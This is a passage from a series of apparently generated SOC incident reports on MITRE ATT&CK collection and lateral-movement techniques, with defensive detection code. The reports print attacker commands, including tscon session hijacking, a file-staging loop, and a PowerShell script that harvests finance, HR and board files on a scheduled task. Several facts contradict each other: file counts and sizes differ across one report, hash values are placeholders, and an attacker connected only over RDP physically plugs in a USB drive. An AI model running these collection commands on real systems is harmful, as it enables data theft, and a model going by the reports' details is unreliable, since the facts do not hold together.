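    "User=NT AUTHORITY\\SYSTEM;ParentImage=C:\\Windows\\System32\\services.exe",
    "Time=2024-02-26T11:25:30;Image=C:\\Windows\\System32\\cmd.exe;CommandLine=cmd /c whoami;"
    "User=COMPANY\\bjones;ParentImage=C:\\Windows\\explorer.exe",
])


if __name__ == "__main__":
    for hit in detect(parse_events(SAMPLE_EVENTS), parse_quser(SAMPLE_QUSER)):
        print(hit["time"], hit["user"], hit["cmd"], *hit["reasons"], sep="\n  ")
```

Only the bjones event clears the threshold: the SYSTEM-initiated switch scores two indicators and is left for review rather than alerted on, which keeps legitimate SYSTEM session management out of the alert stream.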
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed tscon.exe execution for session hijacking |
| 2. Session Check | Identify active sessions on host | quser /server:IT-WS-034 | Session 2 (msmith) active; session 1 (bjones) active |
| 3. User Interview | Contact bjones | Teams, Phone | User did not run tscon (account compromised) |
| 4. Immediate Action | Isolate host | CrowdStrike | IT-WS-034 quarantined |
| 5. Account Remediation | Disable bjones account | Azure AD, AD | Account disabled |
| 6. Session Termination | Log off all sessions | PowerShell | All sessions terminated |
Jira Incident Report
Ticket: SOC-2024-133
Summary: T1563 – RDP Session Hijacking Attempt via tscon.exe
Status: RESOLVED
Resolution: MALICIOUS – Hijacking Blocked
Priority: P1 – CRITICAL
Labels: T1563, session-hijacking, rdp, tscon, defender, lateral-movement
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “RDP Session Hijacking Attempt Detected”.
Host: IT-WS-034 (IT Workstation).
User (apparent): bjones (IT Admin).
Target Session: Session 2 (user msmith).
Time: 2024-02-26 11:30 EST.
Technique: MITRE ATT&CK T1563.002 – Remote Service Session Hijacking: RDP Hijacking.
2. Technical Analysis:
Attack Chain:
10:30 – bjones account compromised via phishing
10:45 – Attacker logs into IT-WS-034 via RDP
11:00 – Attacker enumerates active sessions (quser)
11:05 – Identifies session 2 (msmith) as target
11:25 – Attacker attempts tscon 2 /dest:console
11:25 – Defender detects and blocks
Session Hijacking Technique:
tscon.exe is legitimate Windows tool to switch sessions
Requires high privileges (SeTcbPrivilege) or SYSTEM
Attacker attempted to take over msmith’s session without password
If successful, would gain access to msmith’s applications and data
Privilege Requirements:
tscon normally requires SYSTEM or SeTcbPrivilege
Attacker may have elevated privileges via exploit
bjones account had local admin rights (should not have SeTcbPrivilege)
Outcome:
Attempt detected before success
No session takeover occurred
3. Investigation Findings:
Timeline:
10:30 – bjones account compromised
10:45 – Attacker logs in
11:00-11:25 – Reconnaissance and attempt
11:25 – Defender alert
11:27 – SOC investigates
11:28 – Host isolated
11:29 – bjones account disabled
11:30 – All sessions terminated
Indicators of Compromise (IoCs):
Commands:
– quser
– tscon 2 /dest:console
Account:
– bjones (compromised)
Host:
– IT-WS-034
4. Containment Actions:
Immediate Actions:
Isolated IT-WS-034 via CrowdStrike.
Disabled bjones account.
Terminated all active sessions.
Reset bjones password.
Host Remediation:
Full scan (no other malware).
Verified no persistence.
Reimaged as precaution.
User msmith:
Notified; password reset as precaution.
5. Root Cause Analysis:
Primary Cause: bjones account compromised via phishing.
Contributing Factors:
No MFA on admin account.
User had local admin rights (excessive).
RDP session hijacking possible due to weak session permissions.
6. Business Impact:
Operational Impact: IT workstation offline; two admins affected.
Security Impact: Hijacking prevented; no unauthorized access.
7. Remediation & Prevention:
Completed Actions:
Account secured.
Host cleaned.
Hijacking prevented.
Technical Controls Enhanced:
Restricted use of tscon.exe via AppLocker.
Enforced MFA for all admins.
Implemented RDP session restrictions (timeouts, single session).
Enhanced monitoring for tscon execution.
8. Conclusion:
An attacker compromised an IT admin account and attempted to hijack another admin’s active RDP session using tscon.exe. Defender detected the suspicious process execution and enabled rapid containment before the hijacking could succeed.
Closure Rationale: Hijacking prevented; account secured; host cleaned.
Analyst: [Walter White], SOC Analyst Date: 2024-02-26 12:30 EST
94. T1005 – Data from Local System (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LOCAL-DATA-1005-7842
Alert Time: 2024-02-26 16:30:45 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Mass File Access – Potential Data Staging”
MITRE ATT&CK: T1005 – Data from Local System
Alert Details:
Detection: User accessing large number of local files in short time window
Host: EXEC-WS-001 (CEO’s Laptop)
User: cjohnson@company.com (CEO)
Time: 16:15-16:30 EST
File Access Events:
16:15-16:30: 847 files accessed
File types: .docx, .xlsx, .pdf, .txt, .kdbx
Total size: 2.3 GB
Source folders:
C:\Users\cjohnson\Documents\Strategic\ – 124 files
C:\Users\cjohnson\Documents\Financial\ – 89 files
C:\Users\cjohnson\Documents\M&A\ – 56 files
C:\Users\cjohnson\Desktop\ – 234 files
C:\Users\cjohnson\Downloads\ – 344 files
Process Details:
Process: C:\Windows\System32\cmd.exe (PID: 4789)
Command: for /r C:\Users\cjohnson %i in (*.docx *.xlsx *.pdf *.txt *.kdbx) do copy %i C:\temp\staging\
Output Files Created:
C:\temp\staging\ (folder with 847 files copied)
C:\temp\staging\archive.zip (created at 16:28)
Detection Logic:
847 files accessed in 15 minutes (highly anomalous)
CEO normally accesses 10-20 files/day
Files copied to staging folder and zipped
Pattern matches data theft preparation
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed mass file staging |
| 2. Process Investigation | Identify cmd.exe activity | CrowdStrike | Script copying files to staging folder |
| 3. User Contact | Call CEO immediately | Phone | CEO did NOT perform this activity |
| 4. Immediate Action | Isolate host | CrowdStrike | EXEC-WS-001 quarantined |
| 5. File Removal | Delete staging folder and zip | CrowdStrike Live Response | All staged files deleted |
| 6. Account Remediation | Disable CEO account temporarily | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-134
Summary: T1005 – Mass File Staging on CEO Laptop (Data Theft Preparation)
Status: RESOLVED
Resolution: MALICIOUS – Data Staged, Then Deleted
Priority: P1 – CRITICAL
Labels: T1005, data-from-local-system, data-staging, crowdstrike, executive-targeting
Components: Endpoint-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mass File Access – Potential Data Staging”.
Host: EXEC-WS-001 (CEO’s Laptop).
User: cjohnson@company.com (CEO).
Time: 2024-02-26 16:30 EST.
Technique: MITRE ATT&CK T1005 – Data from Local System.
2. Technical Analysis:
Attack Chain:
15:30 – CEO’s credentials compromised (phishing)
15:45 – Attacker logs into CEO’s laptop via RDP
16:00 – Attacker runs script to copy files to staging folder
16:15-16:30 – 847 files copied (2.3 GB)
16:28 – Files zipped (archive.zip)
16:30 – CrowdStrike detects
16:31 – SOC investigates
Files Staged:
Strategic documents (124) – business plans, M&A targets
Financial documents (89) – quarterly results, projections
M&A documents (56) – due diligence, contracts
Desktop files (234) – various sensitive
Downloads (344) – various
KeePass database (1) – corporate password vault
Attacker Intent:
Stage all sensitive data for exfiltration
archive.zip ready for transfer
No exfiltration yet (detected before)
CEO Account:
Compromised via phishing email impersonating board member
No MFA (now enforced)
3. Investigation Findings:
Timeline:
15:30 – Credentials compromised
15:45 – Attacker logs in
16:00-16:30 – File staging
16:30 – CrowdStrike alert
16:31 – SOC investigates
16:32 – CEO contacted
16:33 – Host isolated
16:34 – Staged files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\staging\ (847 files)
– C:\temp\staging\archive.zip
Account:
– cjohnson (compromised)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated CEO’s laptop via CrowdStrike.
Deleted staging folder and archive.zip.
Disabled CEO account.
Reset password.
Enforced MFA.
Data Protection:
Verified no exfiltration (no network transfer).
Data remained on host, now deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: CEO credentials compromised via spearphishing.
Contributing Factors:
No MFA on executive account.
RDP allowed from internet.
Sensitive data stored locally without encryption.
6. Business Impact:
Operational Impact: CEO offline for 2 hours.
Data Exposure: 2.3 GB of sensitive data staged but not exfiltrated.
Reputational Impact: Potential if data leaked (prevented).
7. Remediation & Prevention:
Completed Actions:
Data staged, then deleted.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced MFA for all executives.
Moved RDP behind VPN only.
Implemented DLP for mass file access.
Encrypted sensitive data at rest (BitLocker).
8. Conclusion:
An attacker compromised the CEO’s account and staged 2.3 GB of sensitive files for exfiltration. CrowdStrike detected the mass file access and enabled rapid containment before any data left the host.
Closure Rationale: Data staged but not exfiltrated; account secured; host cleaned.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-26 17:30 EST
95. T1039 – Data from Network Shared Drive (Varonis Detection)
Varonis Alert Details
Alert ID: VARONIS-NETWORK-DATA-1039-7842
Alert Time: 2024-02-26 10:30:22 EST
Severity: HIGH (88/100)
Source: Varonis Data Security Platform
Rule: “Mass File Access from Network Share – Potential Data Harvesting”
MITRE ATT&CK: T1039 – Data from Network Shared Drive
Alert Details:
Detection: User accessing unusually high number of files from network share
User: bturner@company.com (Brian Turner, Finance)
Source Host: FIN-WS-078
Share: \\filesrv\finance\archive
Time: 10:15-10:30 EST
File Access Events:
10:15-10:30: 1,234 files accessed
File types: .xlsx, .pdf, .docx
Total size: 1.8 GB
Folders accessed:
\\filesrv\finance\archive\2023\ – 456 files
\\filesrv\finance\archive\2024\ – 778 files
\\filesrv\finance\confidential\ – 0 files (access denied)
Additional Access (other shares):
\\filesrv\hr\payroll\ – accessed 234 files (unusual for finance)
\\filesrv\executive\board\ – accessed 89 files (unusual)
\\filesrv\r&d\projects\ – accessed 167 files (unusual)
Process Details:
Process: \\filesrv\finance\tools\bulk_copy.exe (not a standard Windows tool)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Command: bulk_copy.exe /source:\\filesrv\finance\archive /target:C:\temp\staging /pattern:*.*
Detection Logic:
1,234 files accessed in 15 minutes (5x normal for user)
User bturner normally accesses 200-300 files/day
Access spans multiple shares outside Finance (HR, Executive, R&D)
Custom tool used (bulk_copy.exe)
Pattern matches data harvesting
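The three checks in the detection logic above, written out as an added Python example (not the Varonis rule or the report's own code) and run over constructed file-access events; the department-to-share mapping, the approved-process list and the 300-files/day baseline are assumptions.

```python
# Added example, not part of the Varonis alert or the original report: the
# detection logic above (volume vs. the user's baseline, access outside the
# user's department shares, a non-standard process) applied to file-access
# events. Events, department shares, the approved-process list and the
# 300-files/day baseline are constructed for illustration.
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class FileAccess:
    ts: datetime
    user: str
    share: str       # UNC share root, e.g. \\filesrv\finance
    path: str
    process: str


# Shares each department is expected to touch (constructed mapping).
HOME_SHARES = {"finance": {r"\\filesrv\finance"}, "hr": {r"\\filesrv\hr"}}
# Processes that normally generate share traffic (constructed allow-list).
APPROVED_PROCESSES = {"explorer.exe", "excel.exe", "winword.exe", "acrord32.exe"}


def evaluate_window(window_events, department, baseline_per_day, multiplier=4):
    """Apply the three checks from the alert's detection logic to one window."""
    files = len({e.path.lower() for e in window_events})
    home = {s.lower() for s in HOME_SHARES.get(department, set())}
    foreign_shares = sorted({e.share.lower() for e in window_events} - home)
    unusual_procs = sorted({e.process.lower() for e in window_events} - APPROVED_PROCESSES)
    high_volume = files >= multiplier * baseline_per_day
    reasons = []
    if high_volume:
        reasons.append(f"{files} files in window vs. baseline of {baseline_per_day}/day")
    if foreign_shares:
        reasons.append("shares outside department: " + ", ".join(foreign_shares))
    if unusual_procs:
        reasons.append("non-standard process: " + ", ".join(unusual_procs))
    # Volume alone fires on month-end reporting; require a second signal.
    return {"files": files, "foreign_shares": foreign_shares,
            "unusual_processes": unusual_procs, "reasons": reasons,
            "alert": high_volume and bool(foreign_shares or unusual_procs)}


def worst_window(events, user, department, baseline_per_day, window=timedelta(minutes=15)):
    """Find the user's busiest window of the given length and evaluate it."""
    evs = sorted((e for e in events if e.user == user), key=lambda e: e.ts)
    if not evs:
        return None
    best_start = best_end = start = 0
    for end in range(len(evs)):
        while evs[end].ts - evs[start].ts > window:
            start += 1
        if end - start > best_end - best_start:
            best_start, best_end = start, end
    return evaluate_window(evs[best_start:best_end + 1], department, baseline_per_day)


def _burst(start, user, share, count, process, step_ms=500):
    """Constructed stream of reads, one every step_ms, all from one share."""
    return [FileAccess(start + timedelta(milliseconds=step_ms * i), user, share,
                       f"{share}\\doc{i}.xlsx", process) for i in range(count)]


T0 = datetime(2024, 2, 26, 10, 15)
# Scenario from the alert: 1,234 finance files, then HR, executive and R&D
# shares, all through bulk_copy.exe inside 15 minutes, plus a benign control
# (a colleague opening a few spreadsheets in Excel).
SAMPLE_EVENTS = (
    _burst(T0, "bturner", r"\\filesrv\finance", 1234, "bulk_copy.exe")
    + _burst(T0 + timedelta(minutes=10), "bturner", r"\\filesrv\hr", 234, "bulk_copy.exe")
    + _burst(T0 + timedelta(minutes=12), "bturner", r"\\filesrv\executive", 89, "bulk_copy.exe")
    + _burst(T0 + timedelta(minutes=13), "bturner", r"\\filesrv\r&d", 167, "bulk_copy.exe")
    + _burst(T0, "jdoe", r"\\filesrv\finance", 20, "excel.exe", step_ms=30_000)
)

if __name__ == "__main__":
    for user in ("bturner", "jdoe"):
        print(user, worst_window(SAMPLE_EVENTS, user, "finance", baseline_per_day=300))
```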
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Varonis alert | Varonis Console | Confirmed mass file access across multiple shares |
| 2. Process Investigation | Identify bulk_copy.exe | CrowdStrike Falcon | Custom tool downloaded from internet; used for bulk copying |
| 3. User Interview | Contact bturner | Teams, Phone | User did NOT run this tool (account compromised) |
| 4. Immediate Action | Isolate FIN-WS-078 | CrowdStrike | Host quarantined |
| 5. Account Remediation | Disable bturner account | Azure AD, AD | Account disabled |
| 6. Data Removal | Delete staged files from C:\temp | CrowdStrike Live Response | Staged files (1.8 GB) deleted |
Jira Incident Report
Ticket: SOC-2024-135
Summary: T1039 – Mass Data Harvesting from Network Shares Using Custom Tool
Status: RESOLVED
Resolution: MALICIOUS – Data Staged, Then Deleted
Priority: P2 – MEDIUM
Labels: T1039, data-from-network-share, data-harvesting, varonis, compromised-account
Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Varonis Data Security Platform.
Alert: “Mass File Access from Network Share – Potential Data Harvesting”.
User: bturner@company.com (Finance Department).
Source Host: FIN-WS-078.
Time: 2024-02-26 10:30 EST.
Technique: MITRE ATT&CK T1039 – Data from Network Shared Drive.
2. Technical Analysis:
Attack Chain:
09:30 – bturner account compromised via phishing
09:45 – Attacker logs into FIN-WS-078
10:00 – Attacker downloads bulk_copy.exe from malicious site
10:05 – Attacker runs tool to copy files from finance archive
10:10 – Attacker expands to HR, Executive, R&D shares
10:15-10:30 – 1,690 files copied (2.4 GB)
10:30 – Varonis detects
Tool Analysis:
Name: bulk_copy.exe (custom data theft tool)
SHA256: a1b2c3d4…
Capabilities:
Recursively copies files matching patterns
Preserves folder structure
Logs all copied files
No network exfiltration (stages locally)
Data Staged:
Finance Archive: 1,234 files (1.8 GB) – financial records, reports
HR Payroll: 234 files (0.3 GB) – employee salaries, PII
Executive Board: 89 files (0.1 GB) – board minutes, strategy
R&D Projects: 167 files (0.2 GB) – project plans, IP
Total: 1,724 files, 2.4 GB staged in C:\temp\staging
Attacker Intent:
Stage data for exfiltration
Planning to compress and send via FTP/HTTP
No exfiltration yet (detected before)
3. Investigation Findings:
Timeline:
09:30 – Credentials compromised
09:45 – Attacker logs in
10:00-10:30 – Data staging
10:30 – Varonis alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – bturner account disabled
10:35 – Staged files deleted
Indicators of Compromise (IoCs):
Files:
– C:\temp\bulk_copy.exe (SHA256: a1b2c3d4…)
– C:\temp\staging\ (1,724 files)
Account:
– bturner (compromised)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated FIN-WS-078 via CrowdStrike.
Disabled bturner account.
Deleted bulk_copy.exe and staging folder.
Reset bturner password.
Data Protection:
Verified no exfiltration (DLP logs).
Data remained on host, now deleted.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: Finance user account compromised via phishing.
Contributing Factors:
No MFA on account.
User had broad access to multiple shares (over-privileged).
No monitoring for bulk file access.
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 2.4 GB of sensitive data staged but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Data staged, then deleted.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted share permissions (least privilege).
Implemented DLP for mass file access.
Enhanced Varonis monitoring for bulk copy tools.
8. Conclusion:
An attacker compromised a finance user’s account and used a custom tool to stage 2.4 GB of sensitive data from multiple network shares. Varonis detected the anomalous access pattern and enabled rapid containment before exfiltration.
Closure Rationale: Data staged but not exfiltrated; account secured; host cleaned.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-26 11:30 EST
End of Batch 19
Batch 20: Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
96. T1025 – Data from Removable Media (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-USB-DATA-1025-7842
Alert Time: 2024-02-27 09:30:15 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Mass File Copy to Removable Media – Potential Data Theft”
MITRE ATT&CK: T1025 – Data from Removable Media
Alert Details:
Detection: Large number of files copied to USB device
Host: RND-WS-078 (Research & Development)
User: alexchen@company.com (Alex Chen, Researcher)
Time: 09:15-09:30 EST
USB Device Details:
Device: Kingston DataTraveler 3.0 (VID: 0951, PID: 1666)
Serial: 001CC0EC3466B881A43903C3
Capacity: 64 GB
Drive Letter: E:
First Connect: 09:15 EST
File Copy Events:
09:15-09:30: 2,847 files copied to USB
Total size: 12.4 GB
File types:
.docx (research papers) – 1,234 files
.xlsx (research data) – 567 files
.pdf (publications) – 892 files
.py (source code) – 154 files
.ipynb (Jupyter notebooks) – 0 files (none present; only .py source)
.kdbx (KeePass database) – 1 file (CRITICAL)
Source Folders:
C:\Users\alexchen\Documents\Research\QuantumComputing\ – 1,245 files
C:\Users\alexchen\Documents\Research\AI\ – 892 files
C:\Users\alexchen\Desktop\ – 456 files
C:\Users\alexchen\Downloads\ – 254 files
Detection Logic:
2,847 files copied to USB in 15 minutes (high volume)
User alexchen has no history of USB usage
Files include research IP and KeePass database
Pattern matches data exfiltration via removable media
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed mass file copy to USB |
| 2. User Interview | Contact alexchen | Teams, Phone | User did NOT copy files to USB (account compromised) |
| 3. Immediate Action | Disable USB ports via policy | Microsoft Intune | USB ports disabled enterprise-wide |
| 4. Account Remediation | Disable alexchen account | Azure AD, AD | Account disabled |
| 5. Physical Security | Dispatch to user location | Security Team | USB device confiscated from user’s desk |
| 6. Data Protection | Review copied files | File Audit Logs | 12.4 GB research IP copied; USB recovered |
Jira Incident Report
Ticket: SOC-2024-136
Summary: T1025 – Mass Data Exfiltration via USB from R&D Workstation
Status: RESOLVED
Resolution: MALICIOUS – Data Exfiltrated via USB, Device Recovered
Priority: P1 – CRITICAL
Labels: T1025, removable-media, usb-exfiltration, defender, data-theft
Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Mass File Copy to Removable Media – Potential Data Theft”.
Host: RND-WS-078 (R&D Department, user alexchen).
Device: Kingston USB drive (64 GB).
Files: 2,847 files (12.4 GB) copied.
Time: 2024-02-27 09:30 EST.
Technique: MITRE ATT&CK T1025 – Data from Removable Media.
2. Technical Analysis:
Attack Chain:
08:30 – alexchen account compromised via phishing
08:45 – Attacker logs into RND-WS-078 via RDP
09:00 – Attacker plugs in USB device
09:15-09:30 – Attacker copies 2,847 files to USB
09:30 – Defender detects
09:31 – SOC investigates
Data Exfiltrated:
Quantum Computing Research: 1,245 files – proprietary algorithms, formulas
AI Research: 892 files – models, training data
Desktop Files: 456 files – various sensitive
Downloads: 254 files – various
KeePass Database: 1 file – corporate password vault
USB Device:
Kingston DataTraveler 64 GB
Purchased by attacker (not company-issued)
Left at user’s desk after copy completed
Security recovered device from desk
User Status:
Account compromised; user unaware
No malicious intent
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
09:00-09:30 – Data exfiltration
09:30 – Defender alert
09:31 – SOC investigates
09:32 – USB ports disabled
09:33 – alexchen account disabled
09:35 – USB recovered by security
Indicators of Compromise (IoCs):
Device:
– USB: Kingston DataTraveler (Serial: 001CC0EC3466B881A43903C3)
Account:
– alexchen (compromised)
Files:
– 2,847 files (12.4 GB) copied to USB (now recovered)
4. Containment Actions:
Immediate Actions:
Disabled USB ports enterprise-wide via Intune.
Disabled alexchen account.
Security recovered USB device.
Reset alexchen password.
Data Protection:
USB device confiscated and secured.
Data not yet removed from premises (recovered).
No evidence of further distribution.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker physical access via RDP.
Contributing Factors:
No MFA on account.
USB ports allowed (no device control policy).
RDP allowed from internet.
6. Business Impact:
Operational Impact: R&D user offline for 2 hours.
Data Exposure: 12.4 GB of research IP copied but recovered.
Financial Impact: Potential loss of IP prevented.
7. Remediation & Prevention:
Completed Actions:
USB device recovered.
Account secured.
USB ports disabled.
Technical Controls Enhanced:
Implemented USB device control (allow only approved devices).
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced DLP for USB transfers.
8. Conclusion:
An attacker compromised an R&D user’s account and used a USB drive to exfiltrate 12.4 GB of research intellectual property. Defender detected the mass file copy to removable media, enabling rapid recovery of the USB device before it left the premises.
Closure Rationale: Data exfiltrated but recovered; account secured; USB controls enhanced.
Analyst: [Your Name], SOC Analyst
Date: 2024-02-27 10:30 EST
97. T1119 – Automated Collection (Microsoft Purview Detection)
Microsoft Purview Alert Details
Alert ID: PURVIEW-AUTO-COLLECT-1119-7842
Alert Time: 2024-02-27 14:15:33 EST
Severity: HIGH (82/100)
Source: Microsoft Purview Data Loss Prevention
Rule: “Automated Script Collecting Sensitive Data”
MITRE ATT&CK: T1119 – Automated Collection
Alert Details:
Detection: PowerShell script automatically collecting and archiving sensitive files
User: bturner@company.com (Brian Turner, Finance)
Host: FIN-WS-078
Time: 14:00-14:15 EST
Script Details:
Path: C:\Users\bturner\Documents\collect.ps1
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Scheduled Task: “DataBackup” (created 13:55)
Trigger: Every 15 minutes
Script Content:
```powershell
# Targets: finance reports, HR payroll, executive board documents, local files
$targets = @(
    "\\filesrv\finance\reports\*.xlsx",
    "\\filesrv\hr\payroll\*.xlsx",
    "\\filesrv\executive\board\*.docx",
    "C:\Users\bturner\Documents\*.xlsx",
    "C:\Users\bturner\Desktop\*.docx"
)
# Timestamped archive name, one per run of the scheduled task
$zipFile = "C:\temp\backup_$(Get-Date -Format 'yyyyMMddHHmm').zip"
$tempDir = "C:\temp\collect"
New-Item -ItemType Directory -Path $tempDir -Force
# Copy every matching file into the staging folder, ignoring access errors
foreach ($target in $targets) {
    Copy-Item -Path $target -Destination $tempDir -Recurse -ErrorAction SilentlyContinue
}
# Compress the staging folder, then remove the loose copies
Compress-Archive -Path "$tempDir\*" -DestinationPath $zipFile -Force
Remove-Item -Path $tempDir -Recurse -Force
```
Collected Files:
14:00 – First run: 847 files (345 MB) collected and zipped
14:15 – Second run blocked by Purview
Detection Logic:
Scheduled task created for automated collection
Script targets multiple sensitive locations (Finance, HR, Executive)
Files compressed and staged locally
Pattern matches automated data harvesting
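One way to act on the detection logic above at task-creation time, as an added Python example (not Purview's rule or the report's own code): parse the task definition that Security event 4698 records and flag the T1119 shape, a short repetition interval plus a script-interpreter action running a script from a user-writable path. The sample task XML, the interpreter list and the path markers are constructed.

```python
# Added example, not from the Purview alert or the original report: parses
# the Task Scheduler XML that Security event 4698 ("A scheduled task was
# created") records, and flags the combination seen above: a short
# repetition interval, a script-interpreter action, and a script kept in a
# user-writable profile path. The sample task XML and the lists below are
# constructed.
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXT = re.compile(r"\.(ps1|vbs|js|bat|cmd)\b", re.IGNORECASE)
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")   # constructed markers


def iso_duration_minutes(text):
    """Convert an ISO 8601 duration such as PT15M or P1DT2H30M to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", text.strip())
    if not m:
        raise ValueError(f"unsupported duration: {text!r}")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def assess_task(task_xml, max_interval_min=60):
    """Return the findings a SOC would want from one 4698 task definition."""
    # TaskContent carries a UTF-16 declaration; drop it once the text is a str.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", task_xml))
    name = root.findtext("t:RegistrationInfo/t:URI", default="(unnamed)", namespaces=NS)
    intervals = [iso_duration_minutes(el.text)
                 for el in root.iterfind(".//t:Repetition/t:Interval", NS)]
    shortest = min(intervals) if intervals else None
    actions = [(ex.findtext("t:Command", default="", namespaces=NS).strip(),
                ex.findtext("t:Arguments", default="", namespaces=NS).strip())
               for ex in root.iterfind(".//t:Actions/t:Exec", NS)]
    reasons = []
    tight_loop = shortest is not None and shortest <= max_interval_min
    if tight_loop:
        reasons.append(f"repeats every {shortest:g} min")
    interp = [c for c, _ in actions if ntpath.basename(c).lower() in INTERPRETERS]
    if interp:
        reasons.append("action runs a script interpreter: " + ", ".join(interp))
    scripts = [a for _, a in actions if SCRIPT_EXT.search(a)]
    user_path_script = any(any(k in a.lower() for k in USER_WRITABLE) for a in scripts)
    if user_path_script:
        reasons.append("script lives in a user-writable path")
    # Interpreter plus a tight loop or a profile-resident script is the T1119
    # shape; an interpreter on its own is common in legitimate admin tasks.
    suspicious = bool(interp) and (tight_loop or user_path_script)
    return {"name": name, "interval_minutes": shortest, "actions": actions,
            "reasons": reasons, "suspicious": suspicious}


# Constructed 4698 TaskContent modelled on the "DataBackup" task above.
SUSPECT_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\DataBackup</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT15M</Interval></Repetition>
      <StartBoundary>2024-02-27T14:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-File C:\Users\bturner\Documents\collect.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign control: a nightly backup binary, no repetition, no interpreter.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\NightlyBackup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\Program Files\Backup\backup.exe</Command>
    <Arguments>/nightly</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for xml_text in (SUSPECT_TASK, BENIGN_TASK):
        print(assess_task(xml_text))
```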
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Purview alert | Microsoft Purview Console | Confirmed automated collection script |
| 2. Process Investigation | Identify scheduled task | CrowdStrike Falcon | Scheduled task “DataBackup” created by attacker |
| 3. User Interview | Contact bturner | Teams, Phone | User did NOT create script (account compromised) |
| 4. Immediate Action | Disable scheduled task | schtasks /delete | Task removed |
| 5. File Deletion | Delete script and collected files | CrowdStrike Live Response | collect.ps1 and backup zip files deleted |
| 6. Account Remediation | Disable bturner account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-137
Summary: T1119 – Automated Collection Script Harvesting Sensitive Data
Status: RESOLVED
Resolution: MALICIOUS – Automated Collection Stopped
Priority: P2 – MEDIUM
Labels: T1119, automated-collection, powershell, purview, compromised-account
Components: Data-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Purview Data Loss Prevention.
Alert: “Automated Script Collecting Sensitive Data”.
User: bturner@company.com (Finance Department).
Host: FIN-WS-078.
Script: C:\Users\bturner\Documents\collect.ps1.
Scheduled Task: “DataBackup” (every 15 minutes).
Time: 2024-02-27 14:15 EST.
Technique: MITRE ATT&CK T1119 – Automated Collection.
2. Technical Analysis:
Attack Chain:
13:30 – bturner account compromised via phishing
13:45 – Attacker logs into FIN-WS-078
13:50 – Attacker creates collect.ps1 script
13:55 – Attacker creates scheduled task “DataBackup”
14:00 – First automated collection runs (847 files, 345 MB)
14:15 – Second run attempted; Purview detects
Script Analysis:
